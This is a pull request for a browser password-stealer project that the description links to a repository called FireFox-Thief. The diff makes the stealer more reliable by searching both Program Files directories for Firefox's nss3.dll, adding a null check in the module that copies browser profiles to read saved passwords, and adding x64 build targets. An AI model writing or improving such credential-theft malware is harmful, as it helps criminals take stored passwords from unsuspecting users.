### PR TITLE
Fix #1

### DIFF
--- a/Stealer/Modules/Helpers/Profile.cs
+++ b/Stealer/Modules/Helpers/Profile.cs
@@ -23,16 +23,28 @@ namespace Stealer.Helpers
 			"NETGATE Technologies\\BlackHaw",
 			"Moonchild Productions\\Pale Moon"
 		};
-		
-		// Get program files path
-		private static string ProgramFiles()
+
+		private static string[] Concat(string[] x, string[] y)
 		{
+			if (x == null) throw new ArgumentNullException("x");
+			if (y == null) throw new ArgumentNullException("y");
+			int oldLen = x.Length;
+			Array.Resize(ref x, x.Length + y.Length);
+			Array.Copy(y, 0, x, oldLen, y.Length);
+			return x;
+		}
+
+		// Get program files path
+		private static string[] ProgramFilesChildren()
+		{
+			string[] children = Directory.GetDirectories(Environment.GetEnvironmentVariable("ProgramFiles"));
+
 			if (8 == IntPtr.Size || (!String.IsNullOrEmpty(Environment.GetEnvironmentVariable("PROCESSOR_ARCHITEW6432"))))
 			{
-				return Environment.GetEnvironmentVariable("ProgramFiles(x86)");
+				children = Concat(children, Directory.GetDirectories(Environment.GetEnvironmentVariable("ProgramFiles(x86)")));
 			}
 
-			return Environment.GetEnvironmentVariable("ProgramFiles");
+			return children;
 		}
 
 		// Get profile directory location
@@ -55,7 +67,7 @@ namespace Stealer.Helpers
 		// Get directory with nss3.dll
 		public static string GetMozillaPath()
 		{
-			foreach (string sDir in Directory.GetDirectories(ProgramFiles()))
+			foreach (string sDir in ProgramFilesChildren())
 			{
 				if (File.Exists(sDir + "\\nss3.dll") &&
 					File.Exists(sDir + "\\mozglue.dll"))

--- a/Stealer/Modules/Reader/Passwords.cs
+++ b/Stealer/Modules/Reader/Passwords.cs
@@ -52,6 +52,7 @@ namespace Stealer.Reader
 			if (profile == null) return pPasswords;
 			// Get firefox nss3.dll location
 			string Nss3Dir = Profile.GetMozillaPath();
+            if (Nss3Dir == null) return pPasswords;
 			// Copy required files to temp dir
 			string newProfile = CopyRequiredFiles(profile);
 			if (newProfile == null) return pPasswords;

--- a/Stealer/Stealer.csproj
+++ b/Stealer/Stealer.csproj
@@ -50,6 +50,28 @@
   <PropertyGroup>
     <ApplicationIcon>default.ico</ApplicationIcon>
   </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x64'">
+    <DebugSymbols>true</DebugSymbols>
+    <OutputPath>bin\x64\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <DebugType>full</DebugType>
+    <PlatformTarget>x64</PlatformTarget>
+    <LangVersion>7.3</LangVersion>
+    <ErrorReport>prompt</ErrorReport>
+    <CodeAnalysisRuleSet>MinimumRecommendedRules.ruleset</CodeAnalysisRuleSet>
+    <Prefer32Bit>true</Prefer32Bit>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|x64'">
+    <OutputPath>bin\x64\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <Optimize>true</Optimize>
+    <DebugType>pdbonly</DebugType>
+    <PlatformTarget>x64</PlatformTarget>
+    <LangVersion>7.3</LangVersion>
+    <ErrorReport>prompt</ErrorReport>
+    <CodeAnalysisRuleSet>MinimumRecommendedRules.ruleset</CodeAnalysisRuleSet>
+    <Prefer32Bit>true</Prefer32Bit>
+  </PropertyGroup>
   <ItemGroup>
     <Reference Include="System" />
     <Reference Include="System.Core" />

--- a/Stealer/Stealer.sln
+++ b/Stealer/Stealer.sln
@@ -8,13 +8,19 @@ EndProject
 Global
 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 		Debug|Any CPU = Debug|Any CPU
+		Debug|x64 = Debug|x64
 		Release|Any CPU = Release|Any CPU
+		Release|x64 = Release|x64
 	EndGlobalSection
 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
 		{D0615A53-CAC0-4EA9-BC41-14E6C2233F19}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
 		{D0615A53-CAC0-4EA9-BC41-14E6C2233F19}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{D0615A53-CAC0-4EA9-BC41-14E6C2233F19}.Debug|x64.ActiveCfg = Debug|x64
+		{D0615A53-CAC0-4EA9-BC41-14E6C2233F19}.Debug|x64.Build.0 = Debug|x64
 		{D0615A53-CAC0-4EA9-BC41-14E6C2233F19}.Release|Any CPU.ActiveCfg = Release|Any CPU
 		{D0615A53-CAC0-4EA9-BC41-14E6C2233F19}.Release|Any CPU.Build.0 = Release|Any CPU
+		{D0615A53-CAC0-4EA9-BC41-14E6C2233F19}.Release|x64.ActiveCfg = Release|x64
+		{D0615A53-CAC0-4EA9-BC41-14E6C2233F19}.Release|x64.Build.0 = Release|x64
 	EndGlobalSection
 	GlobalSection(SolutionProperties) = preSolution
 		HideSolutionNode = FALSE


### PR DESCRIPTION
The possible reason for the error described here - https://github.com/LimerBoy/FireFox-Thief/issues/1 could be that the path to Firefox was not found.
This fix adds all program file paths where browsers may be located.